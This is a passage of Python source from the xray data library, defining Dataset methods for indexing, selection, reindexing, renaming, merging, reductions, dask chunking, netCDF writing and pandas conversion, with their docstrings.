        for k in self._coord_names:
            if set(self._variables[k]._dims) <= needed_dims:
                variables[k] = self._variables[k]
                coord_names.add(k)

        dims = dict((k, self._dims[k]) for k in needed_dims)

        attrs = self.attrs.copy() if keep_attrs else None

        return self._construct_direct(variables, coord_names, dims, attrs)

    def __copy__(self):
        return self.copy(deep=False)

    def __deepcopy__(self, memo=None):
        # memo does nothing but is required for compatibility with
        # copy.deepcopy
        return self.copy(deep=True)

    def __contains__(self, key):
        """The 'in' operator will return true or false depending on whether
        'key' is an array in the dataset or not.
        """
        return key in self._variables

    def __len__(self):
        return len(self._variables)

    def __iter__(self):
        return iter(self._variables)

    @property
    def nbytes(self):
        return sum(v.nbytes for v in self.variables.values())

    @property
    def loc(self):
        """Attribute for location based indexing. Only supports __getitem__,
        and only when the key is a dict of the form {dim: labels}.
        """
        return _LocIndexer(self)

    def __getitem__(self, key):
        """Access variables or coordinates this dataset as a
        :py:class:`~xray.DataArray`.

        Indexing with a list of names will return a new ``Dataset`` object.
        """
        from .dataarray import DataArray

        if utils.is_dict_like(key):
            return self.isel(**key)

        key = np.asarray(key)
        if key.ndim == 0:
            return DataArray._new_from_dataset(self, key.item())
        else:
            return self._copy_listed(key)

    def __setitem__(self, key, value):
        """Add an array to this dataset.

        If value is a `DataArray`, call its `select_vars()` method, rename it
        to `key` and merge the contents of the resulting dataset into this
        dataset.

        If value is an `Variable` object (or tuple of form
        ``(dims, data[, attrs])``), add it to this dataset as a new
        variable.
        """
        if utils.is_dict_like(key):
            raise NotImplementedError('cannot yet use a dictionary as a key '
                                      'to set Dataset values')
        self.update({key: value})

    def __delitem__(self, key):
        """Remove a variable from this dataset.

        If this variable is a dimension, all variables containing this
        dimension are also removed.
        """
        def remove(k):
            del self._variables[k]
            self._coord_names.discard(k)

        remove(key)

        if key in self._dims:
            del self._dims[key]
            also_delete = [k for k, v in iteritems(self._variables)
                           if key in v.dims]
            for key in also_delete:
                remove(key)

    # mutable objects should not be hashable
    __hash__ = None

    def _all_compat(self, other, compat_str):
        """Helper function for equals and identical"""
        # some stores (e.g., scipy) do not seem to preserve order, so don't
        # require matching order for equality
        compat = lambda x, y: getattr(x, compat_str)(y)
        return (self._coord_names == other._coord_names
                and utils.dict_equiv(self._variables, other._variables,
                                     compat=compat))

    def broadcast_equals(self, other):
        """Two Datasets are broadcast equal if they are equal after
        broadcasting all variables against each other.

        For example, variables that are scalar in one dataset but non-scalar in
        the other dataset can still be broadcast equal if the the non-scalar
        variable is a constant.

        See Also
        --------
        Dataset.equals
        Dataset.identical
        """
        try:
            return self._all_compat(other, 'broadcast_equals')
        except (TypeError, AttributeError):
            return False

    def equals(self, other):
        """Two Datasets are equal if they have matching variables and
        coordinates, all of which are equal.

        Datasets can still be equal (like pandas objects) if they have NaN
        values in the same locations.

        This method is necessary because `v1 == v2` for ``Dataset``
        does element-wise comparisions (like numpy.ndarrays).

        See Also
        --------
        Dataset.broadcast_equals
        Dataset.identical
        """
        try:
            return self._all_compat(other, 'equals')
        except (TypeError, AttributeError):
            return False

    def identical(self, other):
        """Like equals, but also checks all dataset attributes and the
        attributes on all variables and coordinates.

        See Also
        --------
        Dataset.broadcast_equals
        Dataset.equals
        """
        try:
            return (utils.dict_equiv(self.attrs, other.attrs)
                    and self._all_compat(other, 'identical'))
        except (TypeError, AttributeError):
            return False

    @property
    def indexes(self):
        """OrderedDict of pandas.Index objects used for label based indexing
        """
        return Indexes(self)

    @property
    def coords(self):
        """Dictionary of xray.DataArray objects corresponding to coordinate
        variables
        """
        return DatasetCoordinates(self)

    @property
    def data_vars(self):
        """Dictionary of xray.DataArray objects corresponding to data variables
        """
        return Variables(self)

    @property
    def vars(self):  # pragma: no cover
        warnings.warn('the Dataset property `vars` has been deprecated; '
                      'use `data_vars` instead',
                      FutureWarning, stacklevel=2)
        return self.data_vars

    def set_coords(self, names, inplace=False):
        """Given names of one or more variables, set them as coordinates

        Parameters
        ----------
        names : str or list of str
            Name(s) of variables in this dataset to convert into coordinates.
        inplace : bool, optional
            If True, modify this dataset inplace. Otherwise, create a new
            object.

        Returns
        -------
        Dataset
        """
        # TODO: allow inserting new coordinates with this method, like
        # DataFrame.set_index?
        # nb. check in self._variables, not self.data_vars to insure that the
        # operation is idempotent
        if isinstance(names, basestring):
            names = [names]
        self._assert_all_in_dataset(names)
        obj = self if inplace else self.copy()
        obj._coord_names.update(names)
        return obj

    def reset_coords(self, names=None, drop=False, inplace=False):
        """Given names of coordinates, reset them to become variables

        Parameters
        ----------
        names : str or list of str, optional
            Name(s) of non-index coordinates in this dataset to reset into
            variables. By default, all non-index coordinates are reset.
        drop : bool, optional
            If True, remove coordinates instead of converting them into
            variables.
        inplace : bool, optional
            If True, modify this dataset inplace. Otherwise, create a new
            object.

        Returns
        -------
        Dataset
        """
        if names is None:
            names = self._coord_names - set(self.dims)
        else:
            if isinstance(names, basestring):
                names = [names]
            self._assert_all_in_dataset(names)
            _assert_empty(
                set(names) & set(self.dims),
                'cannot remove index coordinates with reset_coords: %s')
        obj = self if inplace else self.copy()
        obj._coord_names.difference_update(names)
        if drop:
            for name in names:
                del obj._variables[name]
        return obj

    def dump_to_store(self, store, encoder=None, sync=True):
        """Store dataset contents to a backends.*DataStore object."""
        variables, attrs = conventions.encode_dataset_coordinates(self)
        if encoder:
            variables, attrs = encoder(variables, attrs)
        store.store(variables, attrs)
        if sync:
            store.sync()

    def to_netcdf(self, path=None, mode='w', format=None, group=None,
                  engine=None):
        """Write dataset contents to a netCDF file.

        Parameters
        ----------
        path : str, optional
            Path to which to save this dataset. If no path is provided, this
            function returns the resulting netCDF file as a bytes object; in
            this case, we need to use scipy.io.netcdf, which does not support
            netCDF version 4 (the default format becomes NETCDF3_64BIT).
        mode : {'w', 'a'}, optional
            Write ('w') or append ('a') mode. If mode='w', any existing file at
            this location will be overwritten.
        format : {'NETCDF4', 'NETCDF4_CLASSIC', 'NETCDF3_64BIT', 'NETCDF3_CLASSIC'}, optional
            File format for the resulting netCDF file:

            * NETCDF4: Data is stored in an HDF5 file, using netCDF4 API
              features.
            * NETCDF4_CLASSIC: Data is stored in an HDF5 file, using only
              netCDF 3 compatibile API features.
            * NETCDF3_64BIT: 64-bit offset version of the netCDF 3 file format,
              which fully supports 2+ GB files, but is only compatible with
              clients linked against netCDF version 3.6.0 or later.
            * NETCDF3_CLASSIC: The classic netCDF 3 file format. It does not
              handle 2+ GB files very well.

            All formats are supported by the netCDF4-python library.
            scipy.io.netcdf only supports the last two formats.

            The default format is NETCDF4 if you are saving a file to disk and
            have the netCDF4-python library available. Otherwise, xray falls
            back to using scipy to write netCDF files and defaults to the
            NETCDF3_64BIT format (scipy does not support netCDF4).
        group : str, optional
            Path to the netCDF4 group in the given file to open (only works for
            format='NETCDF4'). The group(s) will be created if necessary.
        engine : {'netcdf4', 'scipy', 'h5netcdf'}, optional
            Engine to use when writing netCDF files. If not provided, the
            default engine is chosen based on available dependencies, with a
            preference for 'netcdf4' if writing to a file on disk.
        """
        from ..backends.api import to_netcdf
        return to_netcdf(self, path, mode, format, group, engine)

    dump = utils.function_alias(to_netcdf, 'dumps')
    dumps = utils.function_alias(to_netcdf, 'dumps')

    def __repr__(self):
        return formatting.dataset_repr(self)

    @property
    def chunks(self):
        """Block dimensions for this dataset's data or None if it's not a dask
        array.
        """
        chunks = {}
        for v in self.variables.values():
            if v.chunks is not None:
                new_chunks = list(zip(v.dims, v.chunks))
                if any(chunk != chunks[d] for d, chunk in new_chunks
                       if d in chunks):
                    raise ValueError('inconsistent chunks')
                chunks.update(new_chunks)
        return Frozen(SortedKeysDict(chunks))

    def chunk(self, chunks=None, lock=False):
        """Coerce all arrays in this dataset into dask arrays with the given
        chunks.

        Non-dask arrays in this dataset will be converted to dask arrays. Dask
        arrays will be rechunked to the given chunk sizes.

        If neither chunks is not provided for one or more dimensions, chunk
        sizes along that dimension will not be updated; non-dask arrays will be
        converted into dask arrays with a single block.

        Parameters
        ----------
        chunks : int or dict, optional
            Chunk sizes along each dimension, e.g., ``5`` or
            ``{'x': 5, 'y': 5}``.
        lock : optional
            Passed on to :py:func:`dask.array.from_array`, if the array is not
            already as dask array.

        Returns
        -------
        chunked : xray.Dataset
        """
        if isinstance(chunks, Number):
            chunks = dict.fromkeys(self.dims, chunks)

        if chunks is not None:
            bad_dims = [d for d in chunks if d not in self.dims]
            if bad_dims:
                raise ValueError('some chunks keys are not dimensions on this '
                                 'object: %s' % bad_dims)

        def selkeys(dict_, keys):
            if dict_ is None:
                return None
            return dict((d, dict_[d]) for d in keys if d in dict_)

        def maybe_chunk(name, var, chunks):
            chunks = selkeys(chunks, var.dims)
            if not chunks:
                chunks = None
            if var.ndim > 0:
                return var.chunk(chunks, name=name, lock=lock)
            else:
                return var

        variables = OrderedDict([(k, maybe_chunk(k, v, chunks))
                                 for k, v in self.variables.items()])
        return self._replace_vars_and_dims(variables)

    def isel(self, **indexers):
        """Returns a new dataset with each array indexed along the specified
        dimension(s).

        This method selects values from each array using its `__getitem__`
        method, except this method does not require knowing the order of
        each array's dimensions.

        Parameters
        ----------
        **indexers : {dim: indexer, ...}
            Keyword arguments with names matching dimensions and values given
            by integers, slice objects or arrays.

        Returns
        -------
        obj : Dataset
            A new Dataset with the same contents as this dataset, except each
            array and dimension is indexed by the appropriate indexers. In
            general, each array's data will be a view of the array's data
            in this dataset, unless numpy fancy indexing was triggered by using
            an array indexer, in which case the data will be a copy.

        See Also
        --------
        Dataset.sel
        DataArray.isel
        DataArray.sel
        """
        invalid = [k for k in indexers if not k in self.dims]
        if invalid:
            raise ValueError("dimensions %r do not exist" % invalid)

        # all indexers should be int, slice or np.ndarrays
        indexers = [(k, (np.asarray(v)
                         if not isinstance(v, (int, np.integer, slice))
                         else v))
                    for k, v in iteritems(indexers)]

        variables = OrderedDict()
        for name, var in iteritems(self._variables):
            var_indexers = dict((k, v) for k, v in indexers if k in var.dims)
            variables[name] = var.isel(**var_indexers)
        return self._replace_vars_and_dims(variables)

    def sel(self, method=None, **indexers):
        """Returns a new dataset with each array indexed by tick labels
        along the specified dimension(s).

        In contrast to `Dataset.isel`, indexers for this method should use
        labels instead of integers.

        Under the hood, this method is powered by using Panda's powerful Index
        objects. This makes label based indexing essentially just as fast as
        using integer indexing.

        It also means this method uses pandas's (well documented) logic for
        indexing. This means you can use string shortcuts for datetime indexes
        (e.g., '2000-01' to select all values in January 2000). It also means
        that slices are treated as inclusive of both the start and stop values,
        unlike normal Python indexing.

        Parameters
        ----------
        method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
            Method to use for inexact matches (requires pandas>=0.16):

            * default: only exact matches
            * pad / ffill: propgate last valid index value forward
            * backfill / bfill: propagate next valid index value backward
            * nearest: use nearest valid index value
        **indexers : {dim: indexer, ...}
            Keyword arguments with names matching dimensions and values given
            by scalars, slices or arrays of tick labels.

        Returns
        -------
        obj : Dataset
            A new Dataset with the same contents as this dataset, except each
            variable and dimension is indexed by the appropriate indexers. In
            general, each variable's data will be a view of the variable's data
            in this dataset, unless numpy fancy indexing was triggered by using
            an array indexer, in which case the data will be a copy.

        See Also
        --------
        Dataset.isel
        DataArray.isel
        DataArray.sel
        """
        return self.isel(**indexing.remap_label_indexers(self, indexers,
                                                         method=method))

    def isel_points(self, dim='points', **indexers):
        """Returns a new dataset with each array indexed pointwise along the
        specified dimension(s).

        This method selects pointwise values from each array and is akin to
        the NumPy indexing behavior of `arr[[0, 1], [0, 1]]`, except this
        method does not require knowing the order of each array's dimensions.

        Parameters
        ----------
        dim : str or DataArray or pandas.Index or other list-like object, optional
            Name of the dimension to concatenate along. If dim is provided as a
            string, it must be a new dimension name, in which case it is added
            along axis=0. If dim is provided as a DataArray or Index or
            list-like object, its name, which must not be present in the
            dataset, is used as the dimension to concatenate along and the
            values are added as a coordinate.
        **indexers : {dim: indexer, ...}
            Keyword arguments with names matching dimensions and values given
            by array-like objects. All indexers must be the same length and
            1 dimensional.

        Returns
        -------
        obj : Dataset
            A new Dataset with the same contents as this dataset, except each
            array and dimension is indexed by the appropriate indexers. With
            pointwise indexing, the new Dataset will always be a copy of the
            original.

        See Also
        --------
        Dataset.sel
        DataArray.isel
        DataArray.sel
        DataArray.isel_points
        """
        indexer_dims = set(indexers)

        def relevant_keys(mapping):
            return [k for k, v in mapping.items()
                    if any(d in indexer_dims for d in v.dims)]

        data_vars = relevant_keys(self.data_vars)
        coords = relevant_keys(self.coords)

        # all the indexers should be iterables
        keys = indexers.keys()
        indexers = [(k, np.asarray(v)) for k, v in iteritems(indexers)]
        # Check that indexers are valid dims, integers, and 1D
        for k, v in indexers:
            if k not in self.dims:
                raise ValueError("dimension %s does not exist" % k)
            if v.dtype.kind != 'i':
                raise TypeError('Indexers must be integers')
            if v.ndim != 1:
                raise ValueError('Indexers must be 1 dimensional')

        # all the indexers should have the same length
        lengths = set(len(v) for k, v in indexers)
        if len(lengths) > 1:
            raise ValueError('All indexers must be the same length')

        # Existing dimensions are not valid choices for the dim argument
        if isinstance(dim, basestring):
            if dim in self.dims:
                # dim is an invalid string
                raise ValueError('Existing dimension names are not valid '
                                 'choices for the dim argument in sel_points')
        elif hasattr(dim, 'dims'):
            # dim is a DataArray or Coordinate
            if dim.name in self.dims:
                # dim already exists
                raise ValueError('Existing dimensions are not valid choices '
                                 'for the dim argument in sel_points')
        else:
            # try to cast dim to DataArray with name = points
            from .dataarray import DataArray
            dim = DataArray(dim, dims='points', name='points')

        # TODO: This would be sped up with vectorized indexing. This will
        # require dask to support pointwise indexing as well.
        return concat([self.isel(**d) for d in
                       [dict(zip(keys, inds)) for inds in
                        zip(*[v for k, v in indexers])]],
                      dim=dim, coords=coords, data_vars=data_vars)

    def reindex_like(self, other, method=None, copy=True):
        """Conform this object onto the indexes of another object, filling
        in missing values with NaN.

        Parameters
        ----------
        other : Dataset or DataArray
            Object with an 'indexes' attribute giving a mapping from dimension
            names to pandas.Index objects, which provides coordinates upon
            which to index the variables in this dataset. The indexes on this
            other object need not be the same as the indexes on this
            dataset. Any mis-matched index values will be filled in with
            NaN, and any mis-matched dimension names will simply be ignored.
        method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
            Method to use for filling index values from other not found in this
            dataset:

            * default: don't fill gaps
            * pad / ffill: propgate last valid index value forward
            * backfill / bfill: propagate next valid index value backward
            * nearest: use nearest valid index value (requires pandas>=0.16)
        copy : bool, optional
            If `copy=True`, the returned dataset contains only copied
            variables. If `copy=False` and no reindexing is required then
            original variables from this dataset are returned.

        Returns
        -------
        reindexed : Dataset
            Another dataset, with this dataset's data but coordinates from the
            other object.

        See Also
        --------
        Dataset.reindex
        align
        """
        return self.reindex(method=method, copy=copy, **other.indexes)

    def reindex(self, indexers=None, method=None, copy=True, **kw_indexers):
        """Conform this object onto a new set of indexes, filling in
        missing values with NaN.

        Parameters
        ----------
        indexers : dict. optional
            Dictionary with keys given by dimension names and values given by
            arrays of coordinates tick labels. Any mis-matched coordinate values
            will be filled in with NaN, and any mis-matched dimension names will
            simply be ignored.
        method : {None, 'nearest', 'pad'/'ffill', 'backfill'/'bfill'}, optional
            Method to use for filling index values in ``indexers`` not found in
            this dataset:

            * default: don't fill gaps
            * pad / ffill: propgate last valid index value forward
            * backfill / bfill: propagate next valid index value backward
            * nearest: use nearest valid index value (requires pandas>=0.16)
        copy : bool, optional
            If `copy=True`, the returned dataset contains only copied
            variables. If `copy=False` and no reindexing is required then
            original variables from this dataset are returned.
        **kw_indexers : optional
            Keyword arguments in the same form as ``indexers``.

        Returns
        -------
        reindexed : Dataset
            Another dataset, with this dataset's data but replaced coordinates.

        See Also
        --------
        Dataset.reindex_like
        align
        pandas.Index.get_indexer
        """
        indexers = utils.combine_pos_and_kw_args(indexers, kw_indexers,
                                                 'reindex')
        if not indexers:
            # shortcut
            return self.copy(deep=True) if copy else self

        variables = alignment.reindex_variables(
            self.variables, self.indexes, indexers, method, copy=copy)
        return self._replace_vars_and_dims(variables)

    def rename(self, name_dict, inplace=False):
        """Returns a new object with renamed variables and dimensions.

        Parameters
        ----------
        name_dict : dict-like
            Dictionary whose keys are current variable or dimension names and
            whose values are new names.
        inplace : bool, optional
            If True, rename variables and dimensions in-place. Otherwise,
            return a new dataset object.

        Returns
        -------
        renamed : Dataset
            Dataset with renamed variables and dimensions.

        See Also
        --------

        Dataset.swap_dims
        DataArray.rename
        """
        for k in name_dict:
            if k not in self:
                raise ValueError("cannot rename %r because it is not a "
                                 "variable in this dataset" % k)
        variables = OrderedDict()
        coord_names = set()
        for k, v in iteritems(self._variables):
            name = name_dict.get(k, k)
            dims = tuple(name_dict.get(dim, dim) for dim in v.dims)
            var = v.copy(deep=False)
            var.dims = dims
            variables[name] = var
            if k in self._coord_names:
                coord_names.add(name)

        return self._replace_vars_and_dims(variables, coord_names,
                                           inplace=inplace)

    def swap_dims(self, dims_dict, inplace=False):
        """Returns a new object with swapped dimensions.

        Parameters
        ----------
        dims_dict : dict-like
            Dictionary whose keys are current dimension names and whose values
            are new names. Each value must already be a variable in the
            dataset.
        inplace : bool, optional
            If True, swap dimensions in-place. Otherwise, return a new dataset
            object.

        Returns
        -------
        renamed : Dataset
            Dataset with swapped dimensions.

        See Also
        --------

        Dataset.rename
        DataArray.swap_dims
        """
        for k, v in dims_dict.items():
            if k not in self.dims:
                raise ValueError('cannot swap from dimension %r because it is '
                                 'not an existing dimension' % k)
            if self.variables[v].dims != (k,):
                raise ValueError('replacement dimension %r is not a 1D '
                                 'variable along the old dimension %r'
                                 % (v, k))

        result_dims = set(dims_dict.get(dim, dim) for dim in self.dims)

        variables = OrderedDict()

        coord_names = self._coord_names.copy()
        coord_names.update(dims_dict.values())

        for k, v in iteritems(self.variables):
            dims = tuple(dims_dict.get(dim, dim) for dim in v.dims)
            var = v.to_coord() if k in result_dims else v.to_variable()
            var.dims = dims
            variables[k] = var

        return self._replace_vars_and_dims(variables, coord_names,
                                           inplace=inplace)

    def update(self, other, inplace=True):
        """Update this dataset's variables with those from another dataset.

        Parameters
        ----------
        other : Dataset or castable to Dataset
            Dataset or variables with which to update this dataset.
        inplace : bool, optional
            If True, merge the other dataset into this dataset in-place.
            Otherwise, return a new dataset object.

        Returns
        -------
        updated : Dataset
            Updated dataset.

        Raises
        ------
        ValueError
            If any dimensions would have inconsistent sizes in the updated
            dataset.
        """
        return self.merge(
            other, inplace=inplace, overwrite_vars=list(other), join='left')

    def merge(self, other, inplace=False, overwrite_vars=set(),
              compat='broadcast_equals', join='outer'):
        """Merge the arrays of two datasets into a single dataset.

        This method generally not allow for overriding data, with the exception
        of attributes, which are ignored on the second dataset. Variables with
        the same name are checked for conflicts via the equals or identical
        methods.

        Parameters
        ----------
        other : Dataset or castable to Dataset
            Dataset or variables to merge with this dataset.
        inplace : bool, optional
            If True, merge the other dataset into this dataset in-place.
            Otherwise, return a new dataset object.
        overwrite_vars : str or sequence, optional
            If provided, update variables of these name(s) without checking for
            conflicts in this dataset.
        compat : {'broadcast_equals', 'equals', 'identical'}, optional
            String indicating how to compare variables of the same name for
            potential conflicts:

            - 'broadcast_equals': all values must be equal when variables are
              broadcast against each other to ensure common dimensions.
            - 'equals': all values and dimensions must be the same.
            - 'identical': all values, dimensions and attributes must be the
              same.
        join : {'outer', 'inner', 'left', 'right'}, optional
            Method for joining ``self`` and ``other`` along shared dimensions:

            - 'outer': use the union of the indexes
            - 'inner': use the intersection of the indexes
            - 'left': use indexes from ``self``
            - 'right': use indexes from ``other``

        Returns
        -------
        merged : Dataset
            Merged dataset.

        Raises
        ------
        ValueError
            If any variables conflict (see ``compat``).
        """
        if compat not in ['broadcast_equals', 'equals', 'identical']:
            raise ValueError("compat=%r invalid: must be 'broadcast_equals', "
                             "'equals' or 'identical'" % compat)

        if isinstance(overwrite_vars, basestring):
            overwrite_vars = [overwrite_vars]
        overwrite_vars = set(overwrite_vars)

        merge = _merge_dataset if isinstance(other, Dataset) else _merge_dict

        replace_vars, new_vars, new_coord_names = merge(
            self, other, overwrite_vars, compat=compat, join=join)

        newly_coords = new_coord_names & (set(self) - set(self.coords))
        no_longer_coords = set(self.coords) & (set(new_vars) - new_coord_names)
        ambiguous_coords = (newly_coords | no_longer_coords) - overwrite_vars
        if ambiguous_coords:
            raise ValueError('cannot merge: the following variables are '
                             'coordinates on one dataset but not the other: %s'
                             % list(ambiguous_coords))

        obj = self if inplace else self.copy()
        obj._update_vars_and_coords(replace_vars, new_coord_names)
        return obj

    def _assert_all_in_dataset(self, names, virtual_okay=False):
        bad_names = set(names) - set(self._variables)
        if virtual_okay:
            bad_names -= self.virtual_variables
        if bad_names:
            raise ValueError('One or more of the specified variables '
                             'cannot be found in this dataset')

    def drop(self, labels, dim=None):
        """Drop variables or index labels from this dataset.

        If a variable corresponding to a dimension is dropped, all variables
        that use that dimension are also dropped.

        Parameters
        ----------
        labels : str
            Names of variables or index labels to drop.
        dim : None or str, optional
            Dimension along which to drop index labels. By default (if
            ``dim is None``), drops variables rather than index labels.

        Returns
        -------
        dropped : Dataset
        """
        if utils.is_scalar(labels):
            labels = [labels]
        if dim is None:
            return self._drop_vars(labels)
        else:
            new_index = self.indexes[dim].drop(labels)
            return self.loc[{dim: new_index}]

    def _drop_vars(self, names):
        self._assert_all_in_dataset(names)
        drop = set(names)
        drop |= set(k for k, v in iteritems(self._variables)
                    if any(name in v.dims for name in names))
        variables = OrderedDict((k, v) for k, v in iteritems(self._variables)
                                if k not in drop)
        coord_names = set(k for k in self._coord_names if k in variables)
        return self._replace_vars_and_dims(variables, coord_names)

    def drop_vars(self, *names):  # pragma: no cover
        warnings.warn('the Dataset method `drop_vars` has been deprecated; '
                      'use `drop` instead',
                      FutureWarning, stacklevel=2)
        return self.drop(names)

    def transpose(self, *dims):
        """Return a new Dataset object with all array dimensions transposed.

        Although the order of dimensions on each array will change, the dataset
        dimensions themselves will remain in fixed (sorted) order.

        Parameters
        ----------
        *dims : str, optional
            By default, reverse the dimensions on each array. Otherwise,
            reorder the dimensions to this order.

        Returns
        -------
        transposed : Dataset
            Each array in the dataset (including) coordinates will be
            transposed to the given order.

        Notes
        -----
        Although this operation returns a view of each array's data, it
        is not lazy -- the data will be fully loaded into memory.

        See Also
        --------
        numpy.transpose
        DataArray.transpose
        """
        if dims:
            if set(dims) ^ set(self.dims):
                raise ValueError('arguments to transpose (%s) must be '
                                 'permuted dataset dimensions (%s)'
                                 % (dims, tuple(self.dims)))
        ds = self.copy()
        for name, var in iteritems(self._variables):
            var_dims = tuple(dim for dim in dims if dim in var.dims)
            ds._variables[name] = var.transpose(*var_dims)
        return ds

    @property
    def T(self):
        return self.transpose()

    def squeeze(self, dim=None):
        """Returns a new dataset with squeezed data.

        Parameters
        ----------
        dim : None or str or tuple of str, optional
            Selects a subset of the length one dimensions. If a dimension is
            selected with length greater than one, an error is raised.  If
            None, all length one dimensions are squeezed.

        Returns
        -------
        squeezed : Dataset
            This dataset, but with with all or a subset of the dimensions of
            length 1 removed.

        Notes
        -----
        Although this operation returns a view of each variable's data, it is
        not lazy -- all variable data will be fully loaded.

        See Also
        --------
        numpy.squeeze
        """
        return common.squeeze(self, self.dims, dim)

    def dropna(self, dim, how='any', thresh=None, subset=None):
        """Returns a new dataset with dropped labels for missing values along
        the provided dimension.

        Parameters
        ----------
        dim : str
            Dimension along which to drop missing values. Dropping along
            multiple dimensions simultaneously is not yet supported.
        how : {'any', 'all'}, optional
            * any : if any NA values are present, drop that label
            * all : if all values are NA, drop that label
        thresh : int, default None
            If supplied, require this many non-NA values.
        subset : sequence, optional
            Subset of variables to check for missing values. By default, all
            variables in the dataset are checked.

        Returns
        -------
        Dataset
        """
        # TODO: consider supporting multiple dimensions? Or not, given that
        # there are some ugly edge cases, e.g., pandas's dropna differs
        # depending on the order of the supplied axes.

        if dim not in self.dims:
            raise ValueError('%s must be a single dataset dimension' % dim)

        if subset is None:
            subset = list(self.data_vars)

        count = np.zeros(self.dims[dim], dtype=np.int64)
        size = 0

        for k in subset:
            array = self._variables[k]
            if dim in array.dims:
                dims = [d for d in array.dims if d != dim]
                count += array.count(dims)
                size += np.prod([self.dims[d] for d in dims])

        if thresh is not None:
            mask = count >= thresh
        elif how == 'any':
            mask = count == size
        elif how == 'all':
            mask = count > 0
        elif how is not None:
            raise ValueError('invalid how option: %s' % how)
        else:
            raise TypeError('must specify how or thresh')

        return self.isel(**{dim: mask})

    def fillna(self, value):
        """Fill missing values in this object.

        This operation follows the normal broadcasting and alignment rules that
        xray uses for binary arithmetic, except the result is aligned to this
        object (``join='left'``) instead of aligned to the intersection of
        index coordinates (``join='inner'``).

        Parameters
        ----------
        value : scalar, ndarray, DataArray, dict or Dataset
            Used to fill all matching missing values in this dataset's data
            variables. Scalars, ndarrays or DataArrays arguments are used to
            fill all data with aligned coordinates (for DataArrays).
            Dictionaries or datasets match data variables and then align
            coordinates if necessary.

        Returns
        -------
        Dataset
        """
        return self._fillna(value)

    def reduce(self, func, dim=None, keep_attrs=False, numeric_only=False,
               allow_lazy=False, **kwargs):
        """Reduce this dataset by applying `func` along some dimension(s).

        Parameters
        ----------
        func : function
            Function which can be called in the form
            `f(x, axis=axis, **kwargs)` to return the result of reducing an
            np.ndarray over an integer valued axis.
        dim : str or sequence of str, optional
            Dimension(s) over which to apply `func`.  By default `func` is
            applied over all dimensions.
        keep_attrs : bool, optional
            If True, the datasets's attributes (`attrs`) will be copied from
            the original object to the new one.  If False (default), the new
            object will be returned without attributes.
        numeric_only : bool, optional
            If True, only apply ``func`` to variables with a numeric dtype.
        **kwargs : dict
            Additional keyword arguments passed on to ``func``.

        Returns
        -------
        reduced : Dataset
            Dataset with this object's DataArrays replaced with new DataArrays
            of summarized data and the indicated dimension(s) removed.
        """
        if isinstance(dim, basestring):
            dims = set([dim])
        elif dim is None:
            dims = set(self.dims)
        else:
            dims = set(dim)

        _assert_empty([dim for dim in dims if dim not in self.dims],
                      'Dataset does not contain the dimensions: %s')

        variables = OrderedDict()
        for name, var in iteritems(self._variables):
            reduce_dims = [dim for dim in var.dims if dim in dims]
            if reduce_dims or not var.dims:
                if name not in self.coords:
                    if (not numeric_only
                            or np.issubdtype(var.dtype, np.number)
                            or var.dtype == np.bool_):
                        if len(reduce_dims) == 1:
                            # unpack dimensions for the benefit of functions
                            # like np.argmin which can't handle tuple arguments
                            reduce_dims, = reduce_dims
                        elif len(reduce_dims) == var.ndim:
                            # prefer to aggregate over axis=None rather than
                            # axis=(0, 1) if they will be equivalent, because
                            # the former is often more efficient
                            reduce_dims = None
                        variables[name] = var.reduce(func, dim=reduce_dims,
                                                     keep_attrs=keep_attrs,
                                                     allow_lazy=allow_lazy,
                                                     **kwargs)
            else:
                variables[name] = var

        coord_names = set(k for k in self.coords if k in variables)
        attrs = self.attrs if keep_attrs else None
        return self._replace_vars_and_dims(variables, coord_names, attrs)

    def apply(self, func, keep_attrs=False, args=(), **kwargs):
        """Apply a function over the data variables in this dataset.

        Parameters
        ----------
        func : function
            Function which can be called in the form `f(x, **kwargs)` to
            transform each DataArray `x` in this dataset into another
            DataArray.
        keep_attrs : bool, optional
            If True, the dataset's attributes (`attrs`) will be copied from
            the original object to the new one. If False, the new object will
            be returned without attributes.
        args : tuple, optional
            Positional arguments passed on to `func`.
        **kwargs : dict
            Keyword arguments passed on to `func`.

        Returns
        -------
        applied : Dataset
            Resulting dataset from applying ``func`` over each data variable.
        """
        variables = OrderedDict(
            (k, maybe_wrap_array(v, func(v, *args, **kwargs)))
            for k, v in iteritems(self.data_vars))
        attrs = self.attrs if keep_attrs else None
        return type(self)(variables, attrs=attrs)

    def assign(self, **kwargs):
        """Assign new data variables to a Dataset, returning a new object
        with all the original variables in addition to the new ones.

        Parameters
        ----------
        kwargs : keyword, value pairs
            keywords are the variables names. If the values are callable, they
            are computed on the Dataset and assigned to new data variables. If
            the values are not callable, (e.g. a DataArray, scalar, or array),
            they are simply assigned.

        Returns
        -------
        ds : Dataset
            A new Dataset with the new variables in addition to all the
            existing variables.

        Notes
        -----
        Since ``kwargs`` is a dictionary, the order of your arguments may not
        be preserved, and so the order of the new variables is not well
        defined. Assigning multiple variables within the same ``assign`` is
        possible, but you cannot reference other variables created within the
        same ``assign`` call.

        See Also
        --------
        pandas.DataFrame.assign
        """
        data = self.copy()
        # do all calculations first...
        results = data._calc_assign_results(kwargs)
        # ... and then assign
        data.update(results)
        return data

    def to_array(self, dim='variable', name=None):
        """Convert this dataset into an xray.DataArray

        The data variables of this dataset will be broadcast against each other
        and stacked along the first axis of the new array. All coordinates of
        this dataset will remain coordinates.

        Parameters
        ----------
        dim : str, optional
            Name of the new dimension.
        name : str, optional
            Name of the new data array.

        Returns
        -------
        array : xray.DataArray
        """
        from .dataarray import DataArray

        data_vars = [self.variables[k] for k in self.data_vars]
        broadcast_vars = broadcast_variables(*data_vars)
        data = ops.stack([b.data for b in broadcast_vars], axis=0)

        coords = dict(self.coords)
        coords[dim] = list(self.data_vars)

        dims = (dim,) + broadcast_vars[0].dims

        return DataArray(data, coords, dims, attrs=self.attrs, name=name)

    def _to_dataframe(self, ordered_dims):
        columns = [k for k in self if k not in self.dims]
        data = [self._variables[k].expand_dims(ordered_dims).values.reshape(-1)
                for k in columns]
        index = self.coords.to_index(ordered_dims)
        return pd.DataFrame(OrderedDict(zip(columns, data)), index=index)

    def to_dataframe(self):
        """Convert this dataset into a pandas.DataFrame.

        Non-index variables in this dataset form the columns of the
        DataFrame. The DataFrame is be indexed by the Cartesian product of
        this dataset's indices.
        """
        return self._to_dataframe(self.dims)

    @classmethod
    def from_dataframe(cls, dataframe):
        """Convert a pandas.DataFrame into an xray.Dataset

        Each column will be converted into an independent variable in the
